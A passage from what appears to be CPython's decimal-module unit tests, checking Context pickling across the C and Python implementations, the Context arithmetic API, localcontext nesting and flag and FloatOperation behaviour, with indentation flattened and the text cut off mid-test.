self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
